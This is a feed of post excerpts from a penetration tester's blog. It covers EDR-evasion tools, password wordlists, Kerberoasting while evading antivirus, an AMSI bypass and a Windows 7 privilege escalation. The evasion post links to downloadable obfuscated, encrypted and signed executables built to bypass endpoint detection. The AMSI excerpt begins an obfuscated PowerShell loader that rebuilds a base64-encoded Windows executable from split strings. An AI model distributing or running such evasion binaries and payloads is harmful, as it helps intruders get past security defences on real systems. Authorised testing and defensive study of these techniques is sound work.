A Pentesters Ramblings

https://sp00ks-git.github.io/A Pentesters RamblingsA way to recall methodologies, during engagements when a specific challenge or cirumstance presents itself. 2023-08-19T21:39:25+01:00 sp00ks https://sp00ks-git.github.io/ Jekyll © 2023 sp00ks /assets/img/favicons/favicon.ico /assets/img/favicons/favicon-96x96.png Evasion Tools2023-07-16T09:50:00+01:00 2023-08-19T21:38:24+01:00 https://sp00ks-git.github.io/posts/evasion-tools/ sp00ks

A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe MU - Signed - https://mega.nz/file/e2gwGIJS#ivCiaYAmi_w_PZz5EPGrehJ2GPlUgEOY1kNphx0nkeQ GH - Un-Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/blob/gh-pages/InteractivePS-defender-c...

Wordlists2023-07-15T21:35:00+01:00 2023-07-15T22:17:44+01:00 https://sp00ks-git.github.io/posts/wordlist/ sp00ks

WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt (~14,300,000 words) rocktastic12a - http://www.mediafire.com/file/9tf3n2d45tgktq1/Rocktastic12a.7z/file (1.37GB - Compressed) dictionary_words - https://github....

Encrypted SPN Scanning2023-03-20T21:00:00+00:00 2023-07-15T20:15:24+01:00 https://sp00ks-git.github.io/posts/Encrypted-SPN-Scanning/ sp00ks

Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of these tools and not just the type of traffic that is being requested (AS-REQ) in my experience this is a better option for Kerberoasting. The powershell script of choice was made by CyberArk over 7 yea...

AMSI2022-06-25T21:42:00+01:00 2023-03-02T22:06:00+00:00 https://sp00ks-git.github.io/posts/amsi/ sp00ks

A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPszD4AAAAAAAAAAAOAAIiALATAAAIwBAAAGAAAAAAAArqsBAAAgAAAAwAEAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAAAgAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEA...

Win7 LPE2021-10-31T13:10:00+00:00 2022-06-26T20:52:28+01:00 https://sp00ks-git.github.io/posts/Win7-LPE/ sp00ks

It is less common than it used to be to find Windows 7 Operating systems in place, have they are still found across domains. Sometimes forbespoke applciatiosn or services that can’t be ported onto upto date Operating Systems for ‘reasons’. I had this scenario on an engagement where I was in an office presented with a Windows7 Desktop, it was a BlackBox unautenticated test and the idea was to s...